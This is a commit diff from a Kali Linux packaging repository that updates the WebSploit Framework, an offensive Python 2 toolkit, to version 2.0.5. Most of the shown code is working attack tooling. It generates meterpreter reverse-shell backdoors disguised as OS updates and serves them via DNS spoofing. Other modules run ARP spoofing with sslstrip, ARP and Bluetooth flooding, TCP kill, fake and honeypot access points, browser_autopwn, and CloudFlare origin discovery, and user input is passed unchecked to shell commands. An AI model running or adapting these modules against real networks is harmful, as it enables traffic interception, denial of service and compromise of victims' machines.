Commit 2bb19508 authored by Emanuele Acri (Kali Developer)'s avatar Emanuele Acri (Kali Developer)

Merge tag 'upstream/2.0.5'

Upstream version 2.0.5
parents a3246e1e 5515b50a
<?xml version="1.0" encoding="UTF-8"?>
<projectDescription>
<name>wsf</name>
<comment></comment>
<projects>
</projects>
<buildSpec>
<buildCommand>
<name>org.python.pydev.PyDevBuilder</name>
<arguments>
</arguments>
</buildCommand>
</buildSpec>
<natures>
<nature>org.python.pydev.pythonNature</nature>
</natures>
</projectDescription>
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<?eclipse-pydev version="1.0"?>
<pydev_project>
<pydev_pathproperty name="org.python.pydev.PROJECT_SOURCE_PATH">
<path>/wsf</path>
</pydev_pathproperty>
<pydev_property name="org.python.pydev.PYTHON_PROJECT_VERSION">python 2.7</pydev_property>
<pydev_property name="org.python.pydev.PYTHON_PROJECT_INTERPRETER">Default</pydev_property>
</pydev_project>
......@@ -5,6 +5,5 @@ Licence For:
BackBox
BackTrack
BlackBuntu
Kali
And All Hacking And Security Distro
------------------
......@@ -21,14 +21,11 @@ Supported Attack :
# [+]MFOD Attack - Middle Finger Of Doom Attack
# [+]Java Applet Attack Vector
# [+]ARP DOS - ARP Cache Denial Of Service Attack With Random MAC
# [+]ARP Poisoner
# [+]Directory Scanner - Scan Target Directorys
# [+]Apache US - Scan Apache users
# [+]PHPMyAdmin - Scan PHPMyAdmin Login Page
# [+]Web Killer - Using From The TCPKill For Down Your WebSite On Network
# [+]Fake AP - Fake Access Point
# [+]FakeUpdate - Fake update attack
# [+]Wifi Jammer - Wifi Jammer Attack
# [+]Wifi Dos - Wifi Dos RQ Attack
# [+]Wifi Honeypot
# [+]Bluetooth POD Attack
# [+]Wifi Jammer - Wifi Jammer Attack
# [+]Wifi Dos - Wifi Dos RQ Attack
......@@ -38,13 +38,36 @@ def main_header():
|_| """
hdr_num = random.randint(1, 3)
header_4 = r"""
__ __ ___ ____ _____ ____ _ ___ ____ ______
| |__| | / _]| \ / ___/| \| | / \| || |
| | | | / [_ | o )( \_ | o ) | | || | | |
| | | || _]| | \__ || _/| |___ | O || | |_| |_|
| ` ' || [_ | O | / \ || | | || || | | |
\ / | || | \ || | | || || | | |
\_/\_/ |_____||_____| \___||__| |_____| \___/|____| |__|
"""
header_5 = r"""
db d8b db d88888b d8888b. .d8888. d8888b. db .d88b. d888888b d888888b
88 I8I 88 88' 88 `8D 88' YP 88 `8D 88 .8P Y8. `88' `~~88~~'
88 I8I 88 88ooooo 88oooY' `8bo. 88oodD' 88 88 88 88 88
Y8 I8I 88 88~~~~~ 88~~~b. `Y8b. 88~~~ 88 88 88 88 88
`8b d8'8b d8' 88. 88 8D db 8D 88 88booo. `8b d8' .88. 88
`8b8' `8d8' Y88888P Y8888P' `8888Y' 88 Y88888P `Y88P' Y888888P YP """
hdr_num = random.randint(1, 5)
if hdr_num ==1:
print header_1
if hdr_num ==2:
print header_2
if hdr_num ==3:
print header_3
if hdr_num ==4:
print header_4
if hdr_num ==5:
print header_5
......@@ -10,8 +10,8 @@ def main_info():
ston = wcolors.color.BLUE + "[" + wcolors.color.ENDC
print ""
print "\t\t--=" + ston + "WebSploit FrameWork"
print "\t+---**---==" + ston + "Version :" + wcolors.color.RED + "2.0.4" + wcolors.color.ENDC
print "\t+---**---==" + ston + "Codename :" + wcolors.color.RED + "MegaTron" + wcolors.color.ENDC
print "\t+---**---==" + ston + "Version :" + wcolors.color.RED + "2.0.5 BETA" + wcolors.color.ENDC
print "\t+---**---==" + ston + "Codename :" + wcolors.color.RED + "We're Not Crying Wolf" + wcolors.color.ENDC
print "\t+---**---==" + ston + "Available Modules : " + wcolors.color.GREEN + "19" + wcolors.color.ENDC
print "\t\t--=" + ston + "Update Date : [" + wcolors.color.RED + "r2.0.4-111 13.6.2013" + wcolors.color.ENDC + "]"
print "\t\t--=" + ston + "Update Date : [" + wcolors.color.RED + "r2.0.5-000 2.3.2014" + wcolors.color.ENDC + "]"
print "\n\n"
#!/usr/bin/env python
#
# WebSploit FrameWork Menu module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com
from core import wcolors
def main_info():
ston = wcolors.color.BLUE + "[" + wcolors.color.ENDC
print ""
print "\t\t--=" + ston + "WebSploit FrameWork"
print "\t+---**---==" + ston + "Version :" + wcolors.color.RED + "2.0.1" + wcolors.color.ENDC
print "\t+---**---==" + ston + "Web Modules : " + wcolors.color.GREEN + "4" + wcolors.color.ENDC
print "\t+---**---==" + ston + "Network Modules : " + wcolors.color.GREEN + "7" + wcolors.color.ENDC
print "\t+---**---==" + ston + "Exploit Modules : " + wcolors.color.GREEN + "3" + wcolors.color.ENDC
print "\t+---**---==" + ston + "Created By :" + wcolors.color.CYAN + "Fardin Allahverdinazhand (0x0ptim0us)" + wcolors.color.ENDC
print "\t+---**---==" + ston + "Report Bug :" + wcolors.color.CYAN + "0x0ptim0us@Gmail.Com" + wcolors.color.ENDC
print "\t\t--=" + ston + "Twitter :" + wcolors.color.CYAN + "@0x0ptim0us" + wcolors.color.ENDC
print "\n\n"
\ No newline at end of file
......@@ -14,6 +14,7 @@ def modules_database():
print "web/dir_scanner\t\t\tDirectory Scanner"
print "web/wmap\t\t\tInformation Gathering From Victim Web Using (Metasploit Wmap)"
print "web/pma\t\t\t\tPHPMyAdmin Login Page Scanner"
print "web/cloudflare_resolver\t\tCloudFlare Resolver"
print "\n"
print (wcolors.color.BLUE + "Network Modules\t\t\tDescription" + wcolors.color.ENDC)
print (wcolors.color.GREEN + "-------------------\t\t---------------------" + wcolors.color.ENDC)
......@@ -23,7 +24,6 @@ def modules_database():
print "network/mlitm\t\t\tMan Left In The Middle Attack"
print "network/webkiller\t\tTCP Kill Attack"
print "network/fakeupdate\t\tFake Update Attack Using DNS Spoof"
print "network/fakeap\t\t\tFake Access Point"
print "network/arp_poisoner\t\tArp Poisoner"
print "\n"
print (wcolors.color.BLUE + "Exploit Modules\t\t\tDescription" + wcolors.color.ENDC)
......
......@@ -10,10 +10,6 @@ from core import wcolors
from time import sleep
def update():
print(wcolors.color.GREEN + "[*]Updating Websploit framework, Please Wait ..." + wcolors.color.ENDC)
sleep(2)
subprocess.Popen("git init", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
sleep(2)
os.system("git pull https://github.com/websploit/update.git")
print(wcolors.color.GREEN + "[*]Update was completed successfully." + wcolors.color.ENDC)
sleep(1)
print(wcolors.color.RED + "[*]Sorry , This Feature Not Available in This Version ..." + wcolors.color.ENDC)
print(wcolors.color.BLUE + "[*]Try With 'upgrade' Command." + wcolors.color.ENDC)
pass
#!/usr/bin/env python
#
# WebSploit FrameWork Update Module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com
import os
import subprocess
from core import wcolors
from time import sleep
def update():
print(wcolors.color.GREEN + "[*]Updating Websploit framework, Please Wait ..." + wcolors.color.ENDC)
sleep(2)
subprocess.Popen("git init", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
sleep(2)
os.system("git pull https://github.com/websploit/update.git")
print(wcolors.color.GREEN + "[*]Update was completed successfully." + wcolors.color.ENDC)
sleep(1)
......@@ -14,7 +14,7 @@ def upgrade():
try:
cu = urllib.urlopen("http://sourceforge.net/projects/websploit/files/")
res = cu.read()
if 'WebSploit Framework V.2.0.5' in res:
if 'WebSploit Framework V.2.1.0' in res:
print(wcolors.color.GREEN + "[*]New Version Available")
sleep(2)
print("[*]Download Latest Version : https://sourceforge.net/projects/websploit/files/latest/download?source=files" + wcolors.color.ENDC)
......
......@@ -4,6 +4,7 @@
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com
import os
import subprocess
from core import wcolors
from core import help
from time import sleep
......@@ -51,8 +52,8 @@ def arp_dos():
pass
elif com[0:3] =='run':
print(wcolors.color.BOLD + wcolors.color.BLUE + "[*]Attack Has Been Started ..." + wcolors.color.ENDC)
command = 'xterm -e ettercap -i '+ options[2] + ' -Tq -P rand_flood ' + '/'+options[0]+'/' + ' ' + '/'+options[1]+'/'+ ' &'
os.system(command)
command = 'ettercap -i '+ options[2] + ' -Tq -P rand_flood ' + '/'+options[0]+'/' + ' ' + '/'+options[1]+'/'
subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
line_4 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_4 += ":"
line_4 += wcolors.color.UNDERL + wcolors.color.BLUE + "ARP DOS" + wcolors.color.ENDC
......
......@@ -56,8 +56,8 @@ def bluetooth_pod():
print(wcolors.color.BLUE + "[*]Bluetooth Ping Of Death Attack Started ..." + wcolors.color.ENDC)
try:
for i in range(1, 10000):
xterm_1 = "xterm -e l2ping -i %s -s %s -f %s &" % (options[0], options[2], options[1])
os.system(xterm_1)
xterm_1 = "l2ping -i %s -s %s -f %s &" % (options[0], options[2], options[1])
subprocess.Popen(xterm_1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
sleep(3)
except(KeyboardInterrupt, OSError):
print(wcolors.color.RED + "[!] Something Is Wrong ! Websploit Bluetooth_POD Module Exit." + wcolors.color.ENDC)
......
......@@ -5,6 +5,7 @@
# Email : 0x0ptim0us@Gmail.Com
import os
import subprocess
from time import sleep
from core import wcolors
from core import help
......@@ -44,7 +45,7 @@ def brow_autopwn():
elif com[0:3] =='run':
print(wcolors.color.YELLOW + "[*]Starting WebServer ... Please Wait ..." + wcolors.color.ENDC)
sleep(2)
os.system('xterm -e /etc/init.d/apache2 start &')
subprocess.Popen('/etc/init.d/apache2 start', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
print(wcolors.color.YELLOW + "[*]Configuration DNS Spoof ... " + wcolors.color.ENDC)
sleep(2)
os.chdir('//tmp')
......@@ -74,7 +75,8 @@ def brow_autopwn():
print(wcolors.color.YELLOW + "[*]Engine Has Been Started." + wcolors.color.ENDC)
sleep(2)
os.chdir('//tmp')
os.system('xterm -e dnsspoof -i ' + options[0] + ' -f fillter.dns &')
command_1 = 'dnsspoof -i ' + options[0] + ' -f fillter.dns'
subprocess.Popen(command_1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
sleep(2)
os.system('msfcli server/browser_autopwn LHOST='+ options[1] + ' URIPATH=index E')
else:
......
#!/usr/bin/env python
#
# WebSploit Framework CloudFlare Resolver module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com
import os
import socket
from core import wcolors
from core import help
from time import sleep
options = ["google.com"]
def cloudflare_resolver():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += ":"
line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "CloudFlare Resolver" + wcolors.color.ENDC
line_1 += " > "
com = raw_input(line_1)
com = com.lower()
if com[0:10] =="set target":
options[0]=com[11:]
print "TARGET => ", options[0]
cloudflare_resolver()
elif com[0:12] =='show options':
print ""
print "Options\t\t Value\t\t\t RQ\t Description"
print "---------\t--------------\t\t----\t--------------"
print "Target\t\t"+options[0]+"\t\tyes\tTarget Address"
cloudflare_resolver()
elif com[0:2] =='os':
os.system(com[3:])
cloudflare_resolver()
elif com[0:4] =='help':
help.help()
cloudflare_resolver()
elif com[0:4] =='back':
pass
elif com[0:3] =='run':
sub = ('mail', 'webmail', 'email', 'direct-connect-mail',
'direct', 'direct-connect', 'cpanel', 'ftp', 'forum', 'blog',
'm', 'dev', 'record', 'ssl', 'dns', 'help', 'ns', 'ns1', 'ns2',
'ns3', 'ns4', 'irc', 'server', 'status', 'status', 'portal', 'beta',
'admin', 'imap', 'smtp')
try:
orgip = socket.gethostbyname(options[0])
print "[-------------------------]"
print "[+] Default IP Address : %s"%orgip
print "[-------------------------]"
except(socket.gaierror):
print "[-] Error : Host is Down !"
for i in sub:
host = i+'.'+options[0]
try:
ip = socket.gethostbyname(host)
print "[+] %s : %s"%(host, ip)
except(socket.gaierror):
print "[-] %s : N/A"%host
cloudflare_resolver()
else:
print "Wrong Command =>" + com
except(KeyboardInterrupt):
print "\n[!] Operation Stoped By User."
\ No newline at end of file
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.254;
option domain-name-servers 8.8.8.8;
range 10.0.0.1 10.0.0.140;
}
\ No newline at end of file
#!/usr/bin/env python
#
# WebSploit Toolkit Fake Access Point module
# Created By 0x0ptim0us (Fardin Allahverdinazhand)
# Email : 0x0ptim0us@Gmail.Com
from time import sleep
from core import wcolors
from core import help
import os
options = ["wlan0", "FakeAP", "11"]
def fake_sts():
print(wcolors.color.RED + "[!]Notice : You Should Be Installed DHCP Before Run This Attack, If DHCP Not Installed Run This Command in Terminal :")
print("sudo apt-get install dhcp3-server" + wcolors.color.ENDC)
fake_ap()
def fake_ap():
try:
line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
line_1 += ":"
line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Fake AP" + wcolors.color.ENDC
line_1 += " > "
com = raw_input(line_1)
com = com.lower()
if com[0:13] =='set interface':
options[0] = com[14:20]
print "INTERFACE => ", options[0]
fake_ap()
elif com[0:9] =='set essid':
options[1] = com[10:]
print "ESSID => ", options[1]
fake_ap()
elif com[0:11] =='set channel':
options[2] = com[12:14]
print "CHANNEL => ", options[2]
fake_ap()
elif com[0:12] =='show options':
print ""
print "Options\t\t Value\t\t\t\t RQ\t Description"
print "---------\t--------------\t\t\t----\t--------------"
print "Interface\t"+options[0]+"\t\t\t\tyes\tWireless Interface Name"
print "ESSID\t\t"+options[1]+"\t\t\t\tyes\tESSID Name For Fake AP"
print "Channel\t\t"+options[2]+"\t\t\t\tyes\tChannel Number"
print ""
fake_ap()
elif com[0:2] =='os':
os.system(com[3:])
fake_ap()
elif com[0:4] =='help':
help.help()
fake_ap()
elif com[0:4] =='back':
pass
elif com[0:3] =='run':
print(wcolors.color.BLUE + "[*]Configure Fake Access Point ..." + wcolors.color.ENDC)
exec_1 = "xterm -e airmon-ng start " + options[0] + " &"
os.system(exec_1)
exec_2 = "xterm -e airbase-ng -e " + options[1] + " -c " + options[2] + " -v " + options[0] + " &"
os.system(exec_2)
print(wcolors.color.BLUE + "[*]Configure iptable ..." + wcolors.color.ENDC)
os.system("xterm -e ifconfig at0 up &")
os.system("xterm -e ifconfig at0 10.0.0.254 netmask 255.255.255.0 &")
os.system("xterm -e route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254 &")
sleep(2)
os.system("xterm -e iptables --flush &")
os.system("xterm -e iptables --table nat --flush &")
os.system("xterm -e iptables --delete-chain &")
os.system("xterm -e iptables --table nat --delete-chain &")
os.system("xterm -e iptables -P FORWARD ACCEPT &")
sleep(2)
os.system("xterm -e iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE &")
print(wcolors.color.BLUE + "[*]Clearing HDCP Leases ..." + wcolors.color.ENDC)
os.system("xterm -e echo > /var/lib/dhcp3/dhcpd.leases &")
os.system("xterm -e ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid &")
print(wcolors.color.BLUE + "[*]Enable IP Forwarding ..." + wcolors.color.ENDC)
os.system("xterm -e echo 1 > /proc/sys/net/ipv4/ip_forward &")
sleep(2)
print(wcolors.color.BLUE + "[*]Starting DHCP Server ..." + wcolors.color.ENDC)
os.system("xterm -e dhcpd3 -d -f -cf /modules/fakeap/dhcpd.conf at0 &")
print(wcolors.color.GREEN + "[*]Create Fake Access Point Successful ..." + wcolors.color.ENDC)
print(wcolors.color.RED + "NOTICE : When You Have Finished Attack, Press [enter] Key For Clean Up" + wcolors.color.YELLOW + " [Important]" + wcolors.color.ENDC)
enter_key = raw_input()
os.system('killall xterm')
os.system('killall ettercap')
os.system('echo "0" > /proc/sys/net/ipv4/ip_forward')
os.system('iptables --flush')
os.system('iptables --table nat --flush')
os.system('iptables --delete-chain')
os.system('iptables --table nat --delete-chain')
else:
print "Wrong Command => ", com
fake_ap()
except(KeyboardInterrupt):
print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Clean Up ..." + wcolors.color.ENDC)
os.system('killall xterm')
os.system('killall ettercap')
os.system('echo "0" > /proc/sys/net/ipv4/ip_forward')
os.system('iptables --flush')
os.system('iptables --table nat --flush')
os.system('iptables --delete-chain')
os.system('iptables --table nat --delete-chain')
......@@ -46,8 +46,8 @@ def fakeupdate():
elif com[0:3] =='run':
print(wcolors.color.CYAN + "[!]Checking Setting, Please Wait ..." + wcolors.color.ENDC)
sleep(2)
os.system('xterm -e rm -rf /var/www/index.php /var/www/index.html /var/www/Linux.jpg /var/www/OSX.jpg /var/www/Windows.jpg /var/www/favicon.ico /var/www/Windows-KB183905-ENU.exe /var/www/Linux-update-EN-659 /var/www/OSX-update-HT3131 &')
os.system('cp modules/fakeupdate/www/* /var/www/')
subprocess.Popen('rm -rf /var/www/index.php /var/www/index.html /var/www/Linux.jpg /var/www/OSX.jpg /var/www/Windows.jpg /var/www/favicon.ico /var/www/Windows-KB183905-ENU.exe /var/www/Linux-update-EN-659 /var/www/OSX-update-HT3131', stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait()
subprocess.Popen('cp /usr/share/websploit/modules/fakeupdate/www/* /var/www/')
print(wcolors.color.CYAN + "[*]Creating Backdoor For Windows OS ..." + wcolors.color.ENDC)
cmd_1 = 'msfpayload windows/meterpreter/reverse_tcp LHOST=' + options[1] + ' LPORT=4441 X > /var/www/Windows-KB183905-ENU.exe'
subprocess.Popen(cmd_1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
......@@ -60,14 +60,14 @@ def fakeupdate():
print(wcolors.color.GREEN + "[*]Create Backdoor's Successful." + wcolors.color.ENDC)
sleep(2)
print(wcolors.color.BLUE + "[*]Starting Web Server ..." + wcolors.color.ENDC)
os.system('xterm -e service apache2 start')
subprocess.Popen('service apache2 start', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
sleep(2)
print(wcolors.color.BLUE + "[*]Starting DNS Spoofing ..." + wcolors.color.ENDC)
try:
os.chdir('/usr/local/share/ettercap')
check_dir = os.listdir(os.curdir)
if 'etter.dns' in check_dir:
os.system('mv /usr/local/share/ettercap/etter.dns etter.dns.old')
subprocess.Popen('mv /usr/local/share/ettercap/etter.dns etter.dns.old', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
my_etter = open('etter.dns', 'w')
my_etter.write('*\tA' + '\t'+ options[1])
my_etter.close()
......@@ -77,15 +77,14 @@ def fakeupdate():
os.chdir('/usr/share/ettercap')
check_dir = os.listdir(os.curdir)
if 'etter.dns' in check_dir:
os.system('mv /usr/share/ettercap/etter.dns etter.dns.old')
subprocess.Popen('mv /usr/share/ettercap/etter.dns etter.dns.old', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
my_etter = open('etter.dns', 'w')
my_etter.write('*\tA' + '\t'+ options[1])
my_etter.close()
except(OSError):
print(wcolors.color.BLUE + "[*]Ettercap Launched ... [OK]" + wcolors.color.ENDC)
dns_spoofing = 'ettercap -Tqi ' + options[0] + ' -M arp // // -P dns_spoof'
dns_spoofing_complete = 'xterm -e '+ dns_spoofing + ' &'
os.system(dns_spoofing_complete)
subprocess.Popen(dns_spoofing, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
print(wcolors.color.BLUE + "[*]Starting Listener For Windows, Linux, MacOSX ..." + wcolors.color.ENDC)
windows_listener = 'xterm -e msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=' + options[1] + ' LPORT=4441 E &'
linux_listener = 'xterm -e msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=' + options[1] + ' LPORT=4442 E &'
......
......@@ -5,6 +5,7 @@
# Email : 0x0ptim0us@Gmail.Com
import os
import subprocess
from core import wcolors
from core import help
from time import sleep
......@@ -54,7 +55,7 @@ def java_applet():
pass
elif com[0:3] =='run':
print(wcolors.color.BOLD + wcolors.color.BLUE + "[*]Setting Up , Wait A Few Seconds ..." + wcolors.color.ENDC)
os.system('xterm -e /etc/init.d/apache2 start')
subprocess.Popen('/etc/init.d/apache2 start', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
sleep(2)
os.chdir('//tmp')
check_tmp = os.listdir(os.curdir)
......@@ -75,8 +76,8 @@ def java_applet():
myindex.write('</body>\n')
myindex.write('</html>\n')
myindex.close()
xterm1 = 'xterm -e dnsspoof -i '+ options[0] + ' -f tmp//fillter.dns &'
os.system(xterm1)
xterm1 = 'dnsspoof -i '+ options[0] + ' -f tmp//fillter.dns'
subprocess.Popen(xterm1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
sleep(2)
print(wcolors.color.YELLOW + "[*]Your Index Has Been Changed...")
print("[*]You Can Change The Index From Here => /var/www/index.html")
......
......@@ -49,7 +49,7 @@ def mfod():
pass
elif com[0:3] =='run':
sleep(2)
os.system('xterm -e /etc/init.d/apache2 start &')
subprocess.Popen('/etc/init.d/apache2 start', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
try:
os.chdir('/usr/local/share/ettercap')
check_dir = os.listdir(os.curdir)
......@@ -72,8 +72,7 @@ def mfod():
print(wcolors.color.RED + wcolors.color.BOLD + "[*]Checking Ettercap ... Please Wait ..." + wcolors.color.ENDC)
print(wcolors.color.BOLD + wcolors.color.BLUE + "[*]DNS Spoofing Starting ..." + wcolors.color.ENDC)
dns_spoofing = 'ettercap -Tqi ' + options[0] + ' -M arp // // -P dns_spoof'
dns_spoofing_complete = 'xterm -e '+ dns_spoofing + ' &'
os.system(dns_spoofing_complete)
subprocess.Popen(dns_spoofing, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
print(wcolors.color.BOLD + wcolors.color.BLUE + "[*]MFOD Attack Has Been Started." + wcolors.color.ENDC)
print(wcolors.color.BOLD + wcolors.color.RED + "[*]Notice : After Attack Press [ENTER] For Cleanup [tmp] File's" + wcolors.color.ENDC)
line_4 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC
......
......@@ -5,6 +5,7 @@
# Email : 0x0ptim0us@Gmail.Com
import os
import subprocess
from core import wcolors
from core import help
from time import sleep
......@@ -91,18 +92,17 @@ def mitm():
selected_sniffer = 'driftnet -i ' + options[0]
sleep(2)
if options[4] =='true':
os.system('xterm -e iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 &')
os.system('xterm -e sslstrip -p -k -f &')
subprocess.Popen('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
subprocess.Popen('sslstrip -p -k -f', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
print (wcolors.color.RED + "[*]IP Forwarding ... " + wcolors.color.ENDC)
ip_forwarding = 'xterm -T "WebSploit - Port Forwarding ..." -e "echo 1 > /proc/sys/net/ipv4/ip_forward"'
os.system(ip_forwarding)
subprocess.Popen("echo 1 > /proc/sys/net/ipv4/ip_forward", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
sleep(2)
print (wcolors.color.RED + "[*]ARP Spoofing ... " + wcolors.color.ENDC)
arp_spoofing1 = 'xterm -e arpspoof -i ' + options[0] + ' -t ' + options[2] +' '+ options[1] + ' &'
os.system(arp_spoofing1)
arp_spoofing1 = 'arpspoof -i ' + options[0] + ' -t ' + options[2] +' '+ options[1]
subprocess.Popen(arp_spoofing1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
sleep(2)
arp_spoofing2 = 'xterm -e arpspoof -i ' + options[0] + ' -t ' + options[1] +' '+ options[2] + ' $'
os.system(arp_spoofing2)
arp_spoofing2 = 'arpspoof -i ' + options[0] + ' -t ' + options[1] +' '+ options[2]
subprocess.Popen(arp_spoofing2, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
sleep(2)
print (wcolors.color.BLUE + "[*]Sniffer Starting ..." + wcolors.color.ENDC)
os.system(selected_sniffer)
......
......@@ -5,6 +5,7 @@
# Email : 0x0ptim0us@Gmail.Com
import os
import subprocess
from time import sleep
from core import wcolors
from core import help
......@@ -43,9 +44,10 @@ def webkiller():
pass
elif com[0:3] =='run':
print (wcolors.color.BLUE + "[*]IP Forwarding ..." + wcolors.color.ENDC)
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
subprocess.Popen('echo 1 > /proc/sys/net/ipv4/ip_forward', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
sleep(2)
os.system('xterm -e tcpkill -i ' + options[0] +' -9 host ' + options[1] + ' &')
command_1 = 'tcpkill -i ' + options[0] +' -9 host ' + options[1]
subprocess.Popen(command_1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
line_3 = wcolors.color.GREEN + "[*]Attack Has Been Started, For Stop Attack Press [enter] Key..." + wcolors.color.ENDC
press_ak = raw_input(line_3)
os.system('killall tcpkill')
......
......@@ -28,7 +28,7 @@ def wifi_honeypot():
print "ESSID => ", options[1]
wifi_honeypot()
elif com[0:11] == 'set channel':
options[2] = com[12:13]
options[2] = com[12:14]
print "CHANNEL => ", options[2]
wifi_honeypot()
elif com[0:7] == 'set mac':
......@@ -64,7 +64,7 @@ def wifi_honeypot():
print "channel\t\t"+options[2]+"\t\t\t\tyes\tFakeAP Channel"
print "mac\t\t"+options[3]+"\t\tyes\tFakeAP Mac Address"
print "output\t\t"+options[4]+"\t\tyes\tLog File Location"
print "mon\t\t"+options[5]+"\t\t\t\tyes\tMonitor Mode(default)"
print "mon\t\t"+options[5]+"\t\t\t\tyes\tMonitor Mod(default)"
print "encrypt\t\t"+options[6]+"\t\t\t\tyes\tType Of Encryptions"
print "\n"
print "Numbers\t\t Encryptions"
......@@ -76,34 +76,35 @@ def wifi_honeypot():
print ""
wifi_honeypot()
elif com[0:3] == 'run':
comm1= "xterm -e airbase-ng -a %s -c %s --essid %s %s > %s &" %(options[3], options[2], options[1], options[5], options[4])
comm2= "xterm -e airbase-ng -a %s -c %s --essid %s -W 1 %s > %s &" %(options[3], options[2], options[1], options[5], options[4])
comm3= "xterm -e airbase-ng -a %s -c %s --essid %s -W 1 -z 2 %s > %s &" %(options[3], options[2], options[1], options[5], options[4])
comm4= "xterm -e airbase-ng -a %s -c %s --essid %s -W 1 -Z 4 %s > %s &" %(options[3], options[2], options[1], options[5], options[4])
monit_mod_start= "airmon-ng start %s" %(options[0])
print(wcolors.color.GREEN+"[*]Enable monitor mode on your interface [%s] ..."+wcolors.color.ENDC)% (options[0]),
comm1= "xterm -e airbase-ng -a %s -c %s --essid %s %s > %s &" % (options[3], options[2], options[1], options[5], options[4])
comm2= "xterm -e airbase-ng -a %s -c %d --essid %s -W 1 %s > %s &" % str(options[3], options[2], options[1], options[5], options[4])
comm3= "xterm -e airbase-ng -a %s -c %d --essid %s -W 1 -z 2 %s > %s &" % str(options[3], options[2], options[1], options[5], options[4])
comm4= "xterm -e airbase-ng -a %s -c %d --essid %s -W 1 -Z 4 %s > %s &" % str(options[3], options[2], options[1], options[5], options[4])
monit_mod_start= "airmon-ng start %s" % str(options[1])
print(wcolors.color.GREEN+"[*]Enable monitor mod on your interface [%s] ..."+wcolors.color.ENDC)% (options[0]),
subprocess.Popen(monit_mod_start, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print(wcolors.color.GREEN+" [OK]"+wcolors.color.ENDC)
print(wcolors.color.GREEN+"[*]Creating Fake Access Point ..."+wcolors.color.ENDC),
if options[6]=='1':
if options[6]==1:
os.system(comm1)
elif options[6]=='2':
elif options[6]==2:
os.system(comm2)
elif options[6]=='3':
elif options[6]==3:
os.system(comm3)
elif options[6]=='4':
elif options[6]==4:
os.system(comm4)
else:
print(wcolors.color.RED+"[!]Error : Encryption ID not Found!"+wcolors.color.ENDC)
pass
sleep(2)
print(wcolors.color.GREEN+" [OK]"+wcolors.color.ENDC)
wifi_honeypot()
elif com[0:4]=='stop':
monit_mod_stop="xterm -e airmon-ng stop %s"%(options[5])
os.system("killall xterm")
os.system("killall airbase-ng")
os.system(monit_mod_stop)
wifi_honeypot()
else:
print "Wrong Command => ", com
wifi_honeypot()
except(KeyboardInterrupt):
print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)
print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)
\ No newline at end of file
......@@ -32,6 +32,7 @@
# Blog : www.websploit.ir
#
import os
import readline, rlcompleter
from time import sleep
from core import wcolors
from core import menu
......@@ -45,6 +46,7 @@ from modules import apache_users
from modules import wmap
from modules import directory_scanner
from modules import phpmyadmin
from modules import cloudflare_resolver
from modules import arp_dos
from modules import autopwn
from modules import mitm
......@@ -58,7 +60,6 @@ from modules import wifi_jammer
from modules import wifi_dos
from modules import wifi_honeypot
from modules import bluetooth_pod
from modules.fakeap import fake_ap
from modules.fakeupdate import fakeupdate
def main():
......@@ -70,6 +71,9 @@ def main():
if terminal[4:20] =='web/apache_users':
apache_users.apache_users()
main()
if terminal[4:27] =='web/cloudflare_resolver':
cloudflare_resolver.cloudflare_resolver()
main()
elif terminal[4:20] =='network/arp_dos':
arp_dos.arp_dos()